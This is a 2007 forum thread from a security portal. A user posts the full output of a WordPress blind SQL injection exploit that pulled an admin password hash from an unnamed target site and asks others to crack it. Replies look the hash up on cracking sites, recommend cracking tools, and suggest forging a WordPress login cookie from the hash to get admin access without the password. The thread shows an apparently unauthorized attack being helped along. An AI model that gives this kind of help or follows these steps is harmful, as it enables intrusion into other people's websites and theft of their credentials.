Waraxe IT Security Portal  
  Login or Register
::  Home  ::  Search  ::  Your Account  ::  Forums  ::   Waraxe Advisories  ::  Tools  ::
September 18, 2019
Menu
 Home
 Logout
 Discussions
 Forums
 Members List
 IRC chat
 Tools
 Base64 coder
 MD5 hash
 CRC32 checksum
 ROT13 coder
 SHA-1 hash
 URL-decoder
 Sql Char Encoder
 Affiliates
 y3dips ITsec
 Md5 Cracker
 User Manuals
 AlbumNow
 Content
 Content
 Sections
 FAQ
 Top
 Info
 Feedback
 Recommend Us
 Search
 Journal
 Your Account



User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9145

People Online:
Visitors: 231
Members: 0
Total: 231
PacketStorm News
Currently there is a problem with headlines from this site
Log in Register Forum FAQ Memberlist Search
IT Security and Insecurity Portal

www.waraxe.us Forum Index -> All other security holes -> Hi and TAnks
Post new topic  Reply to topic View previous topic :: View next topic 
Hi and TAnks
PostPosted: Sat Jun 09, 2007 2:52 pm Reply with quote
https
Regular user
Regular user
 
Joined: Jun 09, 2007
Posts: 5




Hi i use a WordPress Expolit and Give me a this code:
c96a154afc8155f9be50ca4e6ee26617
Tanks For Crack
Have God Time
TANKS
View user's profile Send private message
PostPosted: Sat Jun 09, 2007 9:05 pm Reply with quote
https
Regular user
Regular user
 
Joined: Jun 09, 2007
Posts: 5




any boudy can HELP ME?
i have Q this code Is MD5?
if mD5 PLZ HELP ME.
TANKS FOR ANYTING
View user's profile Send private message
Re: Hi and TAnks
PostPosted: Sat Jun 09, 2007 9:37 pm Reply with quote
waraxe
Site admin
Site admin
 
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




https wrote:
Hi i use a WordPress Expolit and Give me a this code:
c96a154afc8155f9be50ca4e6ee26617
Tanks For Crack
Have God Time
TANKS


First, let's try to search this hash from Google:

http://www.google.com/search?hl=en&q=c96a154afc8155f9be50ca4e6ee26617&btnG=Google+Search

Code:

milw0rm.com - free md5/lm hash crackingc96a154afc8155f9be50ca4e6ee26617. notfound. 4:15:11. 2007-05-23 12:14:05. md5. 71015df5375dd4076bd5214f0bfd911d. HaLlo. cracked. 1:45:40 ...
exploit.syue.com/cracker/list.php?start=420 - 21k - Supplemental Result - Cached - Similar pages


And from milw0rm:

Code:

md5 c96a154afc8155f9be50ca4e6ee26617  notfound 4:15:11 2007-05-23 12:14:05


So this seems to be unlikely crackable md5 hash.
But there is one more way to use this hash - you can manually craft special credentials cookie for wordpress and it is good chance to get admin privileges WITHOUT even knowing actual admin's password Very Happy
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Sat Jun 09, 2007 10:50 pm Reply with quote
https
Regular user
Regular user
 
Joined: Jun 09, 2007
Posts: 5




sori i can't Undrestand i use This EXpolit:


Code:
Target: http://XXX/wp-admin/admin-ajax.php sql table prefix: wp_ cookie suffix: 76e5a16dd105e2328e1fe7b9c8befdc4 testing probe delays 9 14 5 13 6 13 mean nondelayed - 6 dsecs mean delayed - 13 dsecs normal delay: 13 deciseconds finding hash now ... char to find is [a-f] curr: 99--99--97 curr: 98--99--98 got user_pass pos 1 --> c current value for user_pass: c char to find is [0-9] curr: 52--57--52 curr: 54--57--54 curr: 55--57--55 curr: 56--57--56 got user_pass pos 2 --> 9 current value for user_pass: c9 char to find is [0-9] curr: 52--57--52 curr: 54--54--52 curr: 53--54--53 got user_pass pos 3 --> 6 current value for user_pass: c96 char to find is [a-f] curr: 99--99--97 curr: 98--98--97 got user_pass pos 4 --> a current value for user_pass: c96a char to find is [0-9] curr: 52--52--48 curr: 50--50--48 curr: 49--49--48 got user_pass pos 5 --> 1 current value for user_pass: c96a1 char to find is [0-9] curr: 52--57--52 curr: 54--54--52 curr: 53--53--52 got user_pass pos 6 --> 5 current value for user_pass: c96a15 char to find is [0-9] curr: 52--52--48 curr: 50--52--50 curr: 51--52--51 got user_pass pos 7 --> 4 current value for user_pass: c96a154 char to find is [a-f] curr: 99--99--97 curr: 98--98--97 got user_pass pos 8 --> a current value for user_pass: c96a154a char to find is [a-f] curr: 99--102--99 curr: 100--102--100 curr: 101--102--101 got user_pass pos 9 --> f current value for user_pass: c96a154af char to find is [a-f] curr: 99--99--97 curr: 98--99--98 got user_pass pos 10 --> c current value for user_pass: c96a154afc char to find is [0-9] curr: 52--57--52 curr: 54--57--54 curr: 55--57--55 curr: 56--56--55 got user_pass pos 11 --> 8 current value for user_pass: c96a154afc8 char to find is [0-9] curr: 52--52--48 curr: 50--50--48 curr: 49--49--48 got user_pass pos 12 --> 1 current value for user_pass: c96a154afc81 char to find is [0-9] curr: 52--57--52 curr: 54--54--52 curr: 53--53--52 got user_pass pos 13 --> 5 current value for user_pass: c96a154afc815 char to find is [0-9] curr: 52--57--52 curr: 54--54--52 curr: 53--53--52 got user_pass pos 14 --> 5 current value for user_pass: c96a154afc8155 char to find is [a-f] curr: 99--102--99 curr: 100--102--100 curr: 101--102--101 got user_pass pos 15 --> f current value for user_pass: c96a154afc8155f char to find is [0-9] curr: 52--57--52 curr: 54--57--54 curr: 55--57--55 curr: 56--57--56 got user_pass pos 16 --> 9 current value for user_pass: c96a154afc8155f9 char to find is [a-f] curr: 99--99--97 curr: 98--98--97 got user_pass pos 17 --> b current value for user_pass: c96a154afc8155f9b char to find is [a-f] curr: 99--102--99 curr: 100--102--100 curr: 101--101--100 got user_pass pos 18 --> e current value for user_pass: c96a154afc8155f9be char to find is [0-9] curr: 52--57--52 curr: 54--54--52 curr: 53--53--52 got user_pass pos 19 --> 5 current value for user_pass: c96a154afc8155f9be5 char to find is [0-9] curr: 52--52--48 curr: 50--50--48 curr: 49--49--48 got user_pass pos 20 --> 0 current value for user_pass: c96a154afc8155f9be50 char to find is [a-f] curr: 99--99--97 curr: 98--99--98 got user_pass pos 21 --> c current value for user_pass: c96a154afc8155f9be50c char to find is [a-f] curr: 99--99--97 curr: 98--98--97 got user_pass pos 22 --> a current value for user_pass: c96a154afc8155f9be50ca char to find is [0-9] curr: 52--52--48 curr: 50--52--50 curr: 51--52--51 got user_pass pos 23 --> 4 current value for user_pass: c96a154afc8155f9be50ca4 char to find is [a-f] curr: 99--102--99 curr: 100--102--100 curr: 101--101--100 got user_pass pos 24 --> e current value for user_pass: c96a154afc8155f9be50ca4e char to find is [0-9] curr: 52--57--52 curr: 54--54--52 curr: 53--54--53 got user_pass pos 25 --> 6 current value for user_pass: c96a154afc8155f9be50ca4e6 char to find is [a-f] curr: 99--102--99 curr: 100--102--100 curr: 101--101--100 got user_pass pos 26 --> e current value for user_pass: c96a154afc8155f9be50ca4e6e char to find is [a-f] curr: 99--102--99 curr: 100--102--100 curr: 101--101--100 got user_pass pos 27 --> e current value for user_pass: c96a154afc8155f9be50ca4e6ee char to find is [0-9] curr: 52--52--48 curr: 50--50--48 curr: 49--50--49 got user_pass pos 28 --> 2 current value for user_pass: c96a154afc8155f9be50ca4e6ee2 char to find is [0-9] curr: 52--57--52 curr: 54--54--52 curr: 53--54--53 got user_pass pos 29 --> 6 current value for user_pass: c96a154afc8155f9be50ca4e6ee26 char to find is [0-9] curr: 52--57--52 curr: 54--57--54 curr: 55--55--54 got user_pass pos 30 --> 6 current value for user_pass: c96a154afc8155f9be50ca4e6ee266 char to find is [0-9] curr: 52--52--48 curr: 50--50--48 curr: 49--49--48 got user_pass pos 31 --> 1 current value for user_pass: c96a154afc8155f9be50ca4e6ee2661 char to find is [0-9] curr: 52--57--52 curr: 54--57--54 curr: 55--55--54 got user_pass pos 32 --> 7 current value for user_pass: c96a154afc8155f9be50ca4e6ee26617 Final result: user_pass=c96a154afc8155f9be50ca4e6ee26617 Work finished Questions and feedback - http://www.waraxe.us/ See ya! :)


And Get ME this Code :c96a154afc8155f9be50ca4e6ee26617
Mayby Not Work!
View user's profile Send private message
PostPosted: Wed Jun 20, 2007 10:15 am Reply with quote
blaxenet
Active user
Active user
 
Joined: Jun 20, 2007
Posts: 26




https wrote:
And Get ME this Code :c96a154afc8155f9be50ca4e6ee26617


From Plain-Text.info
c96a154afc8155f9be50ca4e6ee26617 // cracking

You can also try some other tools like Passwords Pro or other MD5 lookup sites, if that fails then wait until Plain Text has finished and see what the final result is.

But note that it may take a while before Plain Text is finished...
View user's profile Send private message Send e-mail Yahoo Messenger
Hi and TAnks
  www.waraxe.us Forum Index -> All other security holes
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
All times are GMT  
Page 1 of 1  

  
  
 Post new topic  Reply to topic  




Powered by phpBB 2001-2008 phpBB Group






All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2013 Janek Vind "waraxe"
Page Generation: 0.083 Seconds